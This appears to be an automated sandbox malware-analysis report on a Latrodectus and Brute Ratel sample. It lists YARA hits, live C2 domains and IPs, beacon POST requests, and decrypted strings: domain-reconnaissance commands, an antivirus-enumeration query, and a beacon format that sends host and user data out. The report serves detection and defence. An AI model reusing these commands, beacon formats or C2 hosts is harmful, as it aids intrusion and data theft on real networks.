Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800206B0 cpuid

6_2_00000001800206B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_000000018000E5BC

Source: C:\Windows\explorer.exe

Code function: 22_2_013A7318 GetUserNameA,wsprintfA,

22_2_013A7318

Source: C:\Windows\explorer.exe

Code function: 22_2_013ADB28 GetVersionExW,

22_2_013ADB28

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.164.68.73	anikvan.com	Gibraltar	29632	NASSIST-ASGI	true
138.124.183.215	altynbe.com	Norway	8983	NOKIA-ASFI	true
104.21.16.155	workspacin.cloud	United States	13335	CLOUDFLARENETUS	true
3.69.236.35	ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
91.194.11.183	boriz400.com	Russian Federation	42994	HQservCommunicationSolutionsIL	true
54.175.181.104	ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false

Contacted Domains

Name	IP	Active
workspacin.cloud	104.21.16.155	true
ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com	3.69.236.35	true
boriz400.com	91.194.11.183	true
altynbe.com	138.124.183.215	true
anikvan.com	95.164.68.73	true
ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com	54.175.181.104	true
uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io	unknown	unknown
ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://illoskanawer.com/live/	true	Avira URL Cloud: safe	unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure	true	Avira URL Cloud: safe	unknown
https://anikvan.com/content.php	true	Avira URL Cloud: safe	unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure	true	Avira URL Cloud: safe	unknown
https://altynbe.com/content.php	true	Avira URL Cloud: safe	unknown
https://boriz400.com/api/azure	true	Avira URL Cloud: safe	unknown
https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php	true	Avira URL Cloud: safe	unknown
https://altynbe.com/api/azure	true	Avira URL Cloud: safe	unknown
https://boriz400.com/content.php	true	Avira URL Cloud: safe	unknown
https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php	true	Avira URL Cloud: safe	unknown
https://workspacin.cloud/live/	true	Avira URL Cloud: safe	unknown
https://anikvan.com/api/azure	true	Avira URL Cloud: safe	unknown

AV Detection

Found malware configuration

Source: 22.0.explorer.exe.13a0000.0.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}

Multi AV Scanner detection for submitted file

Source: upfilles.dll.dll

ReversingLabs: Detection: 15%

Sample uses string decryption to hide its real strings

Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c ipconfig /all
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c systeminfo
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c nltest /domain_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net view /all /domain
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net view /all
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &ipconfig=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c net config workstation
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /c whoami /groups
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &systeminfo=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain_trusts=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain_trusts_all=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_view_all_domain=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_view_all=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_group=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &wmic=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_config_ws=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &net_wmic_av=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &whoami_group=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &proclist=[
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &desklinks=[
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: "%s"
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Update_%x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Custom_update
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: runnung
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: /files/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Electrol
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: .+`lgSRHYJPpU\IETT05?=CAI
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: POST
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: GET
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: curl/7.88.1
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: p:
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: URLS
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: COMMAND
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ERROR
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: sZp
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: @-
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: <html>
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: <!DOCTYPE
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %s%d.dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: 12345
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &stiller=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %s%d.exe
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: LogonTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %x%x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: TimeTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: PT0H%02dM
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &mac=
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %02x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: :%02x
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: PT0S
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &computername=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: &domain=%s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: \*.dll
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: https://workspacin.cloud/live/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: https://illoskanawer.com/live/
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: AppData
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Desktop
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Startup
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Personal
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Local AppData
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.0.explorer.exe.13a0000.0.unpack	String decryptor: \update_data.dat

Source: unknown	HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2

Source:

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800192B8 FindFirstFileExW,	6_2_00000001800192B8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW,	22_2_013A8BA8
Source: C:\Windows\explorer.exe	Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	22_2_013A1A08
Source: C:\Windows\explorer.exe	Code function: 22_2_013ADCE0 FindFirstFileW,	22_2_013ADCE0

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 138.124.183.215 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 3.69.236.35 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 91.194.11.183 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 54.175.181.104 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 95.164.68.73 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.155 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://workspacin.cloud/live/
Source: Malware configuration extractor	URLs: https://illoskanawer.com/live/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NASSIST-ASGI NASSIST-ASGI
Source: Joe Sandbox View	ASN Name: NOKIA-ASFI NOKIA-ASFI
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: HQservCommunicationSolutionsIL HQservCommunicationSolutionsIL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.ioContent-Length: 656Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 444Connection: Keep-AliveCache-Control: no-cache
